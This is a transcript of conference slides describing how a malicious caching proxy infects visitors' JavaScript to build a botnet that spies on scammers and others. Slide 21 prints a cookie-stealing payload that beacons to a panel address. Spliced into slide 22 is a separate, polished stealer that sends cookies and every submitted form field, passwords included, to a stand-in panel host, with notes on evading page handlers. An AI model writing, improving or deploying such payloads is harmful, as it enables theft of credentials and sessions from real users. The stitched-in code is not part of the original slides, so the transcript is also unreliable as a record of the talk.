Owning the bad guys
TRANSCRIPT
![Page 1: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/1.jpg)
Owning "bad" guys {and mafia} with JavaScript botnets
Chema Alonso & Manu "The Sur"
![Page 2: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/2.jpg)
Let's do a botnet, but…
• We are lazy
• We have no money
• We have no 0-day
• We aren't the FBI
• Nor are we:
• Apple
• Microsoft
![Page 3: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/3.jpg)
Let them get infected
![Page 4: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/4.jpg)
Man-in-the-Middle schemes
• Intercept communications between client and server
• Compromised channel -> Pwned!
• Network
• ARP Spoofing
• Rogue DHCP(6)
• ICMPv6 Spoofing
• SLAAC Attacks
• DNS Spoofing
• …
• Evil FOCA Rulez!
![Page 5: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/5.jpg)
Man in the Browser
• Plugins
• BHO
• Addons
• Access to all data
• Passwords
• Code
• Banking trojans
• "A Russian in my IE"
![Page 6: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/6.jpg)
JavaScript in the Middle
• Poisoning the browser cache
• Not permanent
• Deleting the cache means the infection is cleaned
• Cached content is used as long as it has not expired
• Allows attackers to inject remote JavaScript
• Access to:
• Cookies
• Not HttpOnly ones (more or less)
• HTML code
• Form fields
• URLs
• Code execution
• …
![Page 7: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/7.jpg)
Google Analytics js & malware
![Page 8: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/8.jpg)
How to inject JavaScript code
• Persistent XSS
• Owning HTTP Servers
• Network Man-in-the-Middle attacks
• WiFi
• ARP Spoofing
• IPv6
• Memcache attacks
• Imagination
![Page 9: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/9.jpg)
• Framework to own the browser's cache
• Injects a JavaScript hook in each client
• That JavaScript loads payloads from the C&C
• http://beefproject.com
• Very well-known
![Page 10: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/10.jpg)
How to create a JavaScript Botnet from scratch
![Page 11: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/11.jpg)
TOR Nodes
![Page 12: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/12.jpg)
TOR Nodes
![Page 13: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/13.jpg)
Not Rocket Science…
![Page 14: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/14.jpg)
Buy a bullet-proof host
• Not:
• The Pirate Bay
• Amazon
• (Remember WikiLeaks)
• Megaupload
![Page 15: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/15.jpg)
Configure SQUID Proxy: request flow through the infecting proxy
Client -> Proxy:   GET / HTTP/1.1  Host: www.web.com
Proxy -> Server:   GET / HTTP/1.1  Host: www.web.com
Server -> Proxy:   Response Home.html
Proxy -> Client:   Response Home.html
Client -> Proxy:   GET /a.jsp HTTP/1.1  Host: www.web.com
Proxy -> Server:   GET /a.jsp HTTP/1.1  Host: www.web.com
Server -> Proxy:   Response a.jsp
Proxy -> Client:   Response a.jsp + pasarela.js (include http://evil/payload.js)
Client -> evil:    GET /payload.js HTTP/1.1  Host: evil
![Page 16: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/16.jpg)
Configure SQUID Proxy
squid.conf: activate the URL rewrite program (url_rewrite_program)
.htaccess: Apache "no expiration" policy, so the infected files never expire from the browser cache
![Page 17: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/17.jpg)
Infect all JavaScript files
![Page 18: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/18.jpg)
Infect all JavaScript files
![Page 19: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/19.jpg)
Publish your Proxy
![Page 20: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/20.jpg)
Let Internet do the magic
![Page 21: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/21.jpg)
Do Payloads: Cookie stealing
```javascript
// Beacon the victim's domain, URL and cookies to the panel through a hidden image
// (X.X.X.X is the panel address, left blank in the slide)
document.write("<img id='domaingrabber' src='http://X.X.X.X/panel/" +
  "domaingrabber.php?id=0.0.0.0&" +
  "domain=" + document.domain + "&" +
  "location=" + document.location + "&" +
  "cookie=" + document.cookie + "' style='display:none;'/>");
```
![Page 22: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/22.jpg)
Do Payloads: Form fields stealing
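One beacon builder serving both the cookie-stealing payload above and the form-field-stealing payload of this slide (whose code the deck shows only as a screenshot), as an added example that is not the slides' code. It assumes panel.example.invalid as the panel host and keeps the slide's fixed bot id; both are assumptions. Unlike the slide's document.write trick it URL-encodes every value, so a cookie containing '&' or ';' and a field containing spaces survive the trip to the panel intact.

```javascript
// Added example, not the slides' payload code: one beacon builder for both
// the cookie-stealing and the form-field-stealing payloads. The slide's
// document.write/<img> trick breaks as soon as a cookie or a field value
// contains '&', '=' or a space, so every value is URL-encoded here.
// The panel URL and bot id are assumptions.
'use strict';

const PANEL = 'http://panel.example.invalid/panel/domaingrabber.php'; // assumed
const BOT_ID = '0.0.0.0'; // fixed per-bot id as in the slide; assumed value

// Build the beacon URL from a flat object, encoding every key and value.
function buildBeacon(base, params) {
  const qs = Object.keys(params)
    .map((k) => encodeURIComponent(k) + '=' + encodeURIComponent(String(params[k])))
    .join('&');
  return base + (base.includes('?') ? '&' : '?') + qs;
}

// Cookie payload: the same fields as the slide, now safe to put in a URL.
function cookieBeacon(domain, location, cookie) {
  return buildBeacon(PANEL, { id: BOT_ID, kind: 'cookie', domain, location, cookie });
}

// Form payload: fields arrive as [{name, value, type}] so the logic can be
// exercised outside a browser. Unnamed controls and buttons carry no data.
function formBeacon(domain, action, fields) {
  const data = {};
  for (const f of fields) {
    if (!f.name || f.type === 'submit' || f.type === 'button') continue;
    data[f.name] = f.value;
  }
  return buildBeacon(PANEL, {
    id: BOT_ID, kind: 'form', domain, action, fields: JSON.stringify(data),
  });
}

// Fire-and-forget GET; an <img> load is not subject to CORS, so the panel
// can live anywhere. Returns the URL so callers (and tests) can inspect it.
function send(url) {
  if (typeof Image !== 'undefined') new Image().src = url;
  return url;
}

// Browser-only glue: beacon the cookies once, then watch every form submit in
// the capture phase so a page handler that stops propagation cannot hide it.
if (typeof document !== 'undefined') {
  send(cookieBeacon(document.domain, String(document.location), document.cookie));
  document.addEventListener('submit', (ev) => {
    const form = ev.target;
    const fields = Array.from(form.elements,
      (el) => ({ name: el.name, value: el.value, type: el.type }));
    send(formBeacon(document.domain, form.action, fields));
  }, true);
}

if (typeof module !== 'undefined') {
  module.exports = { buildBeacon, cookieBeacon, formBeacon, send, PANEL };
}
```

Listening on `document` in the capture phase is what makes this work against forms added after the payload ran and against pages that call stopPropagation on their own submit handlers; a per-form listener attached at load time would miss both.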
![Page 23: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/23.jpg)
Enjoy
![Page 24: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/24.jpg)
Who ·"$"·$ is using this kind of service?
![Page 25: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/25.jpg)
Mafias: Help the Prince
![Page 26: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/26.jpg)
Mafias: Nigerian Scammers
![Page 27: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/27.jpg)
Mafias: Nigerian Scammers
![Page 28: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/28.jpg)
Mafias: Nigerian Scammers
![Page 29: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/29.jpg)
Mafias: Nigerian Scammers
![Page 30: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/30.jpg)
Mafias: Nigerian Scammers
![Page 31: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/31.jpg)
Mafias: Predators
![Page 32: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/32.jpg)
Mafias: Predators
![Page 33: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/33.jpg)
Mafias: Predators
![Page 34: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/34.jpg)
Mafias: Predators
![Page 35: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/35.jpg)
Mafias: Predators
![Page 36: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/36.jpg)
Mafias: Predators
![Page 37: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/37.jpg)
Mafias: Predators
![Page 38: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/38.jpg)
Dog Scammers
![Page 39: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/39.jpg)
Warning! This picture could hurt your feelings…
![Page 40: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/40.jpg)
Dog Scammers
![Page 41: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/41.jpg)
Psychotics
![Page 42: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/42.jpg)
Anonymous
![Page 43: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/43.jpg)
Anonymous
![Page 44: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/44.jpg)
Strange people in a strange world
![Page 45: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/45.jpg)
Hax0rs and defacers….
![Page 46: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/46.jpg)
…hacking…
![Page 47: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/47.jpg)
… and hacked
![Page 48: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/48.jpg)
Intranets
![Page 49: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/49.jpg)
And, of course, Pr0n
![Page 50: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/50.jpg)
Pr0n
![Page 51: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/51.jpg)
Do Payloads: Infect websites for the future
![Page 52: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/52.jpg)
Targeting Attacks
• Select the target
• Bank
• Social network
• Intranet
• Analyze the files it loads
• Payload:
• Inject and load an infected file for that target in every website the victim visits.
• Profit.
![Page 53: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/53.jpg)
Demo: Facebook
![Page 54: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/54.jpg)
Protections
• Take care with MITM schemes
• Proxies
• TOR networks
• After using them, clean everything (the browser cache included)
• Cache is not your friend on the Internet
• VPNs are not a silver bullet